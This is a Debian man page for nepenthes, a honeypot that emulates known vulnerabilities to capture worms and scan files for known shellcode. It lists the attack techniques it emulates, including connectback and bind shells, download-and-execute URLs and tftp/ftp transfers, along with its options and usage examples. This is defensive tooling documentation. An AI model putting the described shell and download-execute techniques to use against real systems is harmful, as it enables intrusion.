Provided by: nepenthes_0.1.5-1_i386 bug

NAME

       nepenthes - finest collection -

SYNOPSIS

       nepenthes [OPTIONS]

       nepenthes [OPTIONS] [PATH]

DESCRIPTION

       By  emulating widespread vulnerabilities Nepenthes is able to catch and
       store worms using these vulnerabilities.  Furthermore you are  able  to
       determine  the  malware  activity on a network by deploying a nepenthes
       sensor.  The programm emulates  different  well  known  vulnerabilities
       waiting  for  malicious  connections  trying  to  exploit  these.  If a
       connection tries to exploit something, nepenthes tries to  guess  which
       exploit  is  going  to  be  used.   There  are several different ways a
       exploitation can happen, the attacker can ask nepenthes to

       * connect a provided ip & port offering a shell there (connectback)
       * bind a shell on a port (bindshell)
       * direct execute a shellcommand
       * provide a url from where to download a file and execute the file
       * use specific filetransferr mechanisms to transferr the file (link, blink, mydoom ...)

       If a shell is expected, bindshell or connectback shell, nepenthes  will
       offer  this  shell  to the attacker and fullfill the requested actions.
       In most cases there are two ways worms try to spread themselves using a
       shell,

       tftp - trivial filetransfer protocoll using tftp.exe in Microsoft Windows.
       ftp - filetransfer protocoll using ftp.exe in Microsoft Windows.

       Nepenthes  will  parse  the  shell instructions and try to download the
       file, upon success the file will be stored.

OPTIONS

       -c PATH, --config=PATH
              PATH to nepenthes.conf

       -d PATTERN, --disk-log=PATTERN
              apply filter to console logging. PATTERN can  consist  of  crit,
              warn, info, debug and spam, combine tags using , .

       -f OPTIONS PATH, --file-check=OPTIONS PATH
              Use Nepenthes to check if a file or a directory of files in PATH
              contain known shellcodes.  PATH can be a directory  or  multiple
              files. OPTIONS can be rmknown,rmnonop,nothing.

       -h, --help
              show help

       -H, --large-help
              show help with default values

       -i, --info
              how to contact us

       -k, --check-config
              check nepenthes.conf config for syntax errors

       -l PATTERN, --log=PATTERN
              apply  filter  to  console logging. PATTERN can consist of crit,
              warn, info, debug and spam, combine tags using , .

       -L, --logging-help
              display help for -d and -l

       -o, --no-color
              log without colors to console (does not work yet).

       -r PATH, --chroot=PATH
              chroot to PATH

       -R, --ringlog
              use ringlogger instead of filelogger

       -u USER, --user=USER
              switch the user the process runs as USER must be a users name.

       -g GROUP, --group=GROUP
              switch process group GROUP must be a groups name.

       -v, --version
              show version

       -w, --workingdir
              where shall the process live

EXAMPLES

       nepenthes -d crit,warn,info
                 start nepenthes and log only messaged with loglevel critical,
                 warning and info to disk

       nepenthes -u marshall -g mother
                 start nepenthes and change to user marshall and group mother.

       nepenthes -r /opt/nepenthes
                 start nepenthes and chroot to /opt/nepenthes

       nepenthes -u marshall -g mother -r /opt/nepenthes
                 start nepenthes and change to user marshall and group  mother
                 and  chroot to /opt/nepenthes

       nepenthes -f rmknown,rmnonop,dononp /var/lib/nepenthes/hexdumps/
                 check  the  directory  /var/lib/nepenthes/hexdumps  for known
                 shellcodes,  remove  known  shellcodes,   remove   shellcodes
                 without nop slide, check shellcodes without nopslide.

       nepenthes -f nothing /tmp/*.bin /tmp/unknown_shellcodes/
                 check  the files in the directory /var/lib/nepenthes/hexdumps
                 and  the  files  in  /tmp/*.bin   for  known  shellcodes,  do
                 nothing.

FILES

       /etc/nepenthes/nepenthes.conf
              nepenthes configuration file

       /usr/lib/nepenthes/
              nepenthes modules

       /etc/nepenthes/
              nepenthes modules configuration files

AUTHORS

       This       page       was      written      by      Markus      Koetter
       <nepenthesdev@users.sourceforge.net> for version 0.1.3 of nepenthes. It
       was adapted for Debian by Luciano Bello <luciano@linux.org.ar>.

       Nepenthes   is   developed   by   Paul   Baecher  and  Markus  Koetter.
       http://nepenthes.sourceforge.net/